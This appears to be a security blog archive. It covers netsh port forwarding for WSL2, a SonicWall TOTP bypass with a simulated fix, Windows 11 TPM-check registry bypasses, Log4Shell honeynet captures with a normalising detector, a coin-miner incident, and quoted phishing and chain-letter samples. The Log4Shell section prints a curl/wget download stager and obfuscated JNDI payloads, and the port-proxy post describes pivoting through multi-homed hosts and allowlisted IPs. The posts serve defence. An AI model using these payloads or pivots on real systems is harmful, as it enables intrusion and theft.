Sunday, September 11, 2022

Port forwarding from a VM, Docker or WSL2 to the Windows 10 or 11 host to allow remote access.

If you need to get around the NAT on WSL2, or you have a NAT-only virtual machine in VirtualBox or VMware, you can use the commands below on the host OS to forward a port from the host to the nested virtual machine.

Scenario:

Host OS: Windows 10, IP address 192.168.69.129

VM: Ubuntu on WSL2, IP address 172.25.187.188

We have an Ubuntu box running on Windows 10 under WSL2 and have started a simple HTTP server with python3 on port 9000. To reach that port from the host's LAN, we use netsh to expose it to the wider network.

Now we need to proxy the port through the host so that it connects to the VM running on WSL2.

The commands below must be run as administrator in Command Prompt.

netsh interface portproxy add v4tov4 listenport=9000 listenaddress=192.168.69.129 connectport=9000 connectaddress=172.25.187.188


Now we need to open this port in Windows Defender Firewall with Advanced Security:

netsh advfirewall firewall add rule name="Open Port 9000" dir=in action=allow protocol=TCP localport=9000


Note
Port proxy entries persist across reboots, so remove them when you are done. Also, WSL2 typically gets a new IP address each time it starts, so after a reboot the entry above points at a stale address until you re-add it with the current one. The firewall rule as written accepts connections from any source, so anyone on the LAN can reach the forwarded service.

To see which ports you have enabled:
netsh interface portproxy show all

To remove all port proxy entries:
netsh interface portproxy reset
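The netsh commands above work, but the WSL2 address changes and the entries persist, so in practice you end up re-typing them after every reboot. The following script is an added example, not part of the original post: it reads the current WSL2 address from `wsl hostname -I`, replaces the portproxy entry and firewall rule with the post's values, and can tear both down again. The script name (wsl_portproxy.py), the `--apply`/`--down` flags, the remoteip= scope of 192.168.69.0/24 and the assumption that eth0 is the first address `hostname -I` prints are this example's own.

```python
"""Re-point a netsh portproxy entry at the current WSL2 address.

Added example, not part of the original post. The netsh portproxy and
advfirewall commands are the ones the post uses; reading the WSL2
address from `wsl hostname -I`, the delete-before-add refresh, the
remoteip= scope and the teardown are this example's additions. The
addresses, port and rule name are the post's scenario values.
"""
import ipaddress
import subprocess
import sys

HOST_LISTEN_ADDR = "192.168.69.129"   # LAN address of the Windows host (from the post)
PORT = 9000                           # service port inside WSL2 (from the post)
RULE_NAME = "Open Port 9000"          # firewall rule name (from the post)
LAN_SCOPE = "192.168.69.0/24"         # assumption: only this subnet should reach the port


def parse_wsl_ip(hostname_output):
    """Return the first IPv4 address in `wsl hostname -I` output.

    WSL2 typically gets a fresh NAT address on every start, so the address
    is read at run time instead of being copied from an earlier session.
    Assumes eth0 is listed first, the default for a plain Ubuntu WSL2 instance.
    """
    for token in hostname_output.split():
        try:
            addr = ipaddress.ip_address(token)
        except ValueError:
            continue
        if addr.version == 4:
            return str(addr)
    raise ValueError(f"no IPv4 address in WSL output: {hostname_output!r}")


def portproxy_commands(wsl_ip, port=PORT, listen=HOST_LISTEN_ADDR):
    """netsh commands that (re)create the v4tov4 forward and its firewall rule."""
    ipaddress.IPv4Address(wsl_ip)      # raise on garbage instead of handing it to netsh
    ipaddress.IPv4Address(listen)
    if not 1 <= int(port) <= 65535:
        raise ValueError(f"port out of range: {port}")
    return [
        # Delete first: portproxy entries persist across reboots, and re-running
        # after a reboot must replace the stale WSL2 address, not sit beside it.
        f"netsh interface portproxy delete v4tov4 listenport={port} listenaddress={listen}",
        f"netsh interface portproxy add v4tov4 listenport={port} listenaddress={listen} "
        f"connectport={port} connectaddress={wsl_ip}",
        f'netsh advfirewall firewall delete rule name="{RULE_NAME}"',
        # remoteip= limits the rule to the LAN; the post's rule accepts any source.
        f'netsh advfirewall firewall add rule name="{RULE_NAME}" dir=in action=allow '
        f"protocol=TCP localport={port} remoteip={LAN_SCOPE}",
    ]


def teardown_commands(port=PORT, listen=HOST_LISTEN_ADDR):
    """Commands that remove the forward and its firewall rule when you are done."""
    return [
        f"netsh interface portproxy delete v4tov4 listenport={port} listenaddress={listen}",
        f'netsh advfirewall firewall delete rule name="{RULE_NAME}"',
    ]


def run(commands, apply=False):
    """Print each command; with apply=True also execute it (needs an elevated prompt).

    The strings are built only from validated addresses and integers above,
    so handing them to the shell is safe here.
    """
    for cmd in commands:
        print(cmd)
        if apply:
            subprocess.run(cmd, shell=True, check=False)  # delete steps may fail on first run
    return list(commands)


if __name__ == "__main__":
    apply = "--apply" in sys.argv
    if "--down" in sys.argv:
        run(teardown_commands(), apply)
    else:
        out = subprocess.run(["wsl", "hostname", "-I"], capture_output=True, text=True).stdout
        run(portproxy_commands(parse_wsl_ip(out)), apply)
```

Run it from an elevated prompt: `python wsl_portproxy.py` only prints the commands, `--apply` executes them, and `--down --apply` removes the forward and the rule. Because the add is preceded by a delete, the same invocation is safe to repeat after each reboot.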



Conclusion

This trick can also be used during a security assessment. You may land on a multi-homed machine, one with interfaces on two networks, and port proxying with the built-in netsh is a convenient way to reach a service on the second network through the first.

It can also be used in the cloud to redirect traffic through another public IP. For example, if a client only accepts connections from an allowlisted address, you can stand up a Windows VM at a cloud provider, have the client allowlist its public IP, and then connect from home to the forwarded port on that VM; the proxy relays you into the destination network.


Tuesday, August 30, 2022

SONICWALL TOTP MFA bypass due to misconfiguration

A client called us about what they suspected was a 0-day: someone had bypassed their TOTP MFA. It turned out they had two user groups, one backed by LDAP and one defined directly on the firewall. When a user entered the name with different casing, for example smith as sMiTh, the firewall treated it as a second, distinct user, and that identity was not subject to the TOTP second factor configured for the local account.

All of this came from two distinct VPN groups assigned to the same VPN interface: one using local accounts with TOTP enabled, the other using the LDAP group vpnusers on the domain controller with no TOTP option. Active Directory matches user names case-insensitively, so sMiTh and smith are the same account to the DC, but the firewall's local user database matches exactly, so sMiTh missed the local account and fell through to the LDAP group.

So these people had done everything right and still had a security control bypassed by a misconfiguration that is not at all obvious. When an MFA-enforced group and a non-MFA group are bound to the same interface, the effective policy is the weaker one.


https://www.sonicwall.com/support/knowledge-base/how-do-i-configure-2fa-for-ssl-vpn-with-totp/190829123329169/
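To make the failure mode concrete, here is an added example (not SonicWall code) that models the two groups as two lookup tables and shows the difference between the misconfigured login path and a corrected one. The usernames, password, TOTP secret and the return strings are constructed for the example; the TOTP routine is a plain RFC 6238 implementation so the local group checks a real code.

```python
"""Model of the TOTP bypass described above.

Added example, not SonicWall code. It simulates two VPN groups bound to
one interface: a case-sensitive local group with TOTP, and a
case-insensitive LDAP group without. vpn_login_vulnerable() shows why
'sMiTh' is authenticated without a TOTP code; vpn_login_fixed() shows the
matching fix (canonicalise the name, then apply the stricter policy).
Usernames, the password and the TOTP secret are constructed.
"""
import hashlib
import hmac
import struct
import time

# Constructed directory state: one real person, present in both groups.
LOCAL_USERS = {"smith": {"password": "Winter2022!", "totp_secret": b"12345678901234567890"}}
LDAP_USERS = {"smith": {"password": "Winter2022!"}}   # the DC matches names case-insensitively


def totp_now(secret, t=None, step=30, digits=6):
    """RFC 6238 TOTP (HMAC-SHA1), so the local group checks a real code."""
    counter = int((time.time() if t is None else t) // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def vpn_login_vulnerable(username, password, totp, t=None):
    """Misconfigured order: exact-case local lookup (TOTP enforced), then
    fall through to the LDAP group (case-folded match, no TOTP)."""
    if username in LOCAL_USERS:                       # 'smith' matches, 'sMiTh' does not
        u = LOCAL_USERS[username]
        if password == u["password"] and totp == totp_now(u["totp_secret"], t):
            return True, "local+totp"
        return False, "local: bad password or totp"
    ldap = {k.casefold(): v for k, v in LDAP_USERS.items()}
    u = ldap.get(username.casefold())                 # 'sMiTh' -> 'smith' here
    if u is not None and password == u["password"]:
        return True, "ldap, no mfa"                   # second factor never asked for
    return False, "unknown user"


def vpn_login_fixed(username, password, totp, t=None):
    """Canonicalise the name before any lookup, then apply the most
    restrictive policy of every group the identity belongs to. (The other
    fix is not to bind a no-MFA group to the same interface at all.)"""
    name = username.casefold()
    local = {k.casefold(): v for k, v in LOCAL_USERS.items()}
    ldap = {k.casefold(): v for k, v in LDAP_USERS.items()}
    record = local.get(name) or ldap.get(name)
    if record is None or password != record["password"]:
        return False, "bad credentials"
    if name in local:                                 # local group carries TOTP: enforce it
        if totp != totp_now(local[name]["totp_secret"], t):
            return False, "totp required"
        return True, "local+totp"
    return True, "ldap"
```

The vulnerable path never asks sMiTh for a code because the exact-case check misses the local record and the LDAP branch has no second factor. Canonicalising the name first collapses both spellings onto one identity, and the stricter of the two group policies is what gets applied.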


Thursday, December 23, 2021

Bypass the security and TPM requirements on Windows 11 for lab testing.

  • For lab testing, the Windows 11 installer's hardware checks can be bypassed. During the install you will see the message "This PC can't run Windows 11." (setup blocked because of missing hardware requirements).
  • When you see that message, press Shift+F10 to open a command prompt, then type regedit and press Enter.
  • When the Registry Editor opens, navigate to HKEY_LOCAL_MACHINE\SYSTEM\Setup, right-click the Setup key and select New > Key.
  • When prompted for a name, type LabConfig and press Enter.
  • Right-click the LabConfig key, select New > DWORD (32-bit) Value, name it BypassTPMCheck and set its data to 1.
  • Also create a DWORD (32-bit) value named BypassSecureBootCheck and set it to 1 (needed on older machines that have no Secure Boot option, roughly pre-2010).
  • For unsupported CPUs, create the key HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup and under it a DWORD (32-bit) value AllowUpgradesWithUnsupportedTPMOrCPU set to 1; without it, setup would not install on a machine with less than a 2nd-gen Core i5.
  • Close the new windows, press Back, select the correct edition (Home/Pro etc.) and you will no longer see the "This PC can't run Windows 11." screen.
  • Keep this to lab machines: an install that skips these checks may have no TPM or Secure Boot chain for BitLocker key sealing and measured boot to rely on, so it does not get the protections those requirements exist to provide.



Monday, December 13, 2021

CVE-2021-44228 (Log4Shell) exploitation examples from the CanadaCyber honeynet

CanadaCyber honeynet logging data over the last 3 days.

We see:

Actions (attacker and honeypot addresses replaced by RemoteActor and CCyberPubIP), a download stager that tries curl and falls back to wget; the captured string is truncated:

curl -s RemoteActor:5874/CCyberPubIP:80||wget -q -O-

The most recent hits use obfuscated lookups. Each ${::-x} is a Log4j default-value lookup with an empty key, which resolves to the literal x, so the string below only reassembles into ${jndi:ldap... once Log4j itself expands it. A naive string match for "jndi:" on the raw request never sees it:

RemoteActor HTTP/1.1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-"
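Detection therefore has to undo the same substitution Log4j would perform. The following is an added example, not from the honeynet post: it implements the two lookup forms the hits above rely on (the ${key:-default} default-value form and ${lower:}/${upper:}), collapses them innermost-first, and only then matches for jndi. The request lines are constructed, and 203.0.113.5 is a documentation address.

```python
"""Collapse Log4j lookup obfuscation before matching for jndi.

Added example, not from the honeynet post. It implements the subset of
Log4j 2 string substitution that attackers abuse to hide 'jndi': the
default-value form ${key:-default} (so ${::-j} resolves to 'j') and the
${lower:x} / ${upper:x} lookups, evaluated innermost-first until the text
stops changing. The log lines are constructed; 203.0.113.5 is a
documentation address.
"""
import re

# Innermost lookup only: the body may not itself contain '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body):
    """Evaluate one innermost lookup body; unknown lookups are left literal."""
    if ":-" in body:                                  # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep:
        if prefix.lower() == "lower":
            return arg.lower()
        if prefix.lower() == "upper":
            return arg.upper()
    return "${" + body + "}"                          # e.g. ${jndi:ldap://...} stays as is


def normalize(text, max_rounds=50):
    """Repeatedly collapse innermost lookups; bounded so hostile input terminates."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_jndi_probe(line):
    """True if the line contains a JNDI lookup once obfuscation is removed.
    Lookup prefixes are case-insensitive in Log4j, hence the lower()."""
    return "${jndi:" in normalize(line).lower()


# Constructed request lines in the shape of the honeynet hits above.
SAMPLE_LINES = [
    'GET / HTTP/1.1 UA="${jndi:ldap://203.0.113.5:1389/a}"',
    'GET / HTTP/1.1 UA="${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.5:1389/a}"',
    'GET / HTTP/1.1 UA="${${lower:j}${upper:n}di:${lower:RMI}://203.0.113.5:1099/x}"',
    'GET / HTTP/1.1 UA="Mozilla/5.0 ${date:yyyy}"',
]


def scan(lines):
    """Return the (index, normalised line) pairs that carry a JNDI probe."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_jndi_probe(l)]


if __name__ == "__main__":
    for i, line in scan(SAMPLE_LINES):
        print(f"line {i}: {line}")
```

The bounded loop matters: an attacker who knows you normalise can send deeply nested lookups, and a resolver that runs to a fixed point without a cap turns your detector into a CPU sink. Matching on the normalised text rather than the raw request catches the ${::-j}${::-n}... form and the lower/upper form alike, while the plain ${date:yyyy} line is left alone.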



Local Ottawa man's laptop compromised by a distributed Bitcoin miner.

This all started with a phone call from someone pretending to be his local RRSP representative. After some social engineering, the attacker got the 70-year-old man to install AnyDesk and grant remote access.

A quick look at the Downloads folder shows:


Based on the timestamps, the attacker got in through a legitimate copy of AnyDesk. He then used locally saved banking information to create a bitcoin account, and we also see evidence of a bank transfer:


Later we see the installation of a variety of tools that let the threat actor deploy coin-mining software.

IOCs:

https://www.virustotal.com/gui/file/825729b8f0ce7215119a4035f6d0267a05466fd939f598f848341f3631a0a631

https://www.virustotal.com/gui/file/92b979d18973399b806f50bd4651445d7578f60c7a8b18e4ee761cd06de795e6

Other files of interest:

https://www.virustotal.com/gui/file/2294dbb4c42acca41c46ea5eebc3f5aa10ff1b0d200b4729fcefeda5321294ba/detection

https://www.virustotal.com/gui/file/930a03cb70737c49651fb96114fd3816aeb311d19cfadf312a35107924eca555

Tuesday, May 12, 2020

Be cautious of "Fake scary message, targeting children, Fake chain messages"


The text below is not real. It is a chain letter (chain e-mail, chain message): people send these to scare you or to see how many recipients pass them along, and sometimes they carry hidden code or URLs.

----------------------------------------------------- FAKE ------------------------------------------------------
Hi, I am sorry I had to send this to you, but now that you have opened it you can't stop reading this. Hi, my name is Teresa Fidalgo. I died 27 years ago. If you don't send this to 20 people I will sleep by your side forever. If you don't believe me, search me up. Teresa Fidalgo. So send this to 20 people. A girl ignored this and her mum died 20 days later. NO SEND BACKS! Sorry to send this. Btw this is not fake, search her up on Google. I don't want a death note for my mom.

If you were killed, I wouldn't be at your funeral.💀

👊I'd be in jail for killing the person who killed you.👊
👭We are true friends.👭
We ride together, we die together.
😌Send this to everybody you care about, including me, if you care.😌
#⃣See how many times u get this.#⃣
💯I want you to know you are an amazing friend, till death and forever.💯
😞If I don't get this back, I understand.😞
🤗But I have a game for you.🤗
🤔Once you read this letter,
you must send this to 15 people,
including me.🤔
❤If you get at least three back, you are loved.❤
😦Nobody knows how important something is, until they lose it.😦
Tonight, (right at 12:00pm) the person you love will realize they love you.
😯Then, at 1:00pm to 2:00pm, be ready for the shock of your life!😯
😲If you break this chain, you will have bad luck.😲
💓With love, send this to the 15💓
If you don't, you will turn ugly in one year.
🗣A friend told me to do this, so pass it on.🗣
📲Tomorrow, two boys/girls will ask if they can have your number?📲
📅Send this message to 15 nice people or bad luck starts for a whole year.📅
🙅This is not fake.🙅
🙌Apparently, if you copy and paste this, you will have the best day of your life tomorrow!🙌
😼Good luck!
😃Oh! And don't send this to a group chat!!!
----------------------------------------------------- FAKE ------------------------------------------------------


REF: https://www.independent.co.uk/life-style/gadgets-and-tech/features/who-is-teresa-fidalgo-debunking-the-fake-ghost-story-thats-got-instagram-spooked-9573936.html

REF: https://www.consumer.ftc.gov/articles/how-recognize-and-report-spam-text-messages

REF: https://en.wikipedia.org/wiki/Chain_letter



Wednesday, April 15, 2020

Be cautious of Fake “Your Income Tax Reminder”

If you receive an email with the subject line "Tax Refund available" or "Your Income Tax Reminder", it is fake: do not click on it.

If you have received an email that looks like the following, it is fake; do not fill it in or click on anything in it:

You are eligible to receive a refund of 520.00 CAD.

You have tax returns for period ending 15 Apr 2019, due 15 Apr 2020, now available for refund!

Remember: We tried to send it to you automatically but were unable to do so as we don't have your details on file.

Ready to refund it now?

  • Have your credit/debit card ready.
  • Open the application form below in your browser and login to your myIR account.
  • Follow the instructions on your screen.

Remember, if you are not the intended recipient of this email, please reply to inform us that you have received this email in error and then delete it without retaining any copy.

Note: Make sure all your income, benefits and family details are up to date in myIR, this will help make sure you're getting the right entitlements.

The link leads to a landing page that harvests whatever you enter and steals your personally identifiable information (PII).

Again, the above is not the real CRA page. Two tells: the refund is denominated in CAD, yet the text refers to "myIR", which is the online service of New Zealand's Inland Revenue, not the CRA; and the CRA does not ask you to have a credit or debit card ready to issue a refund.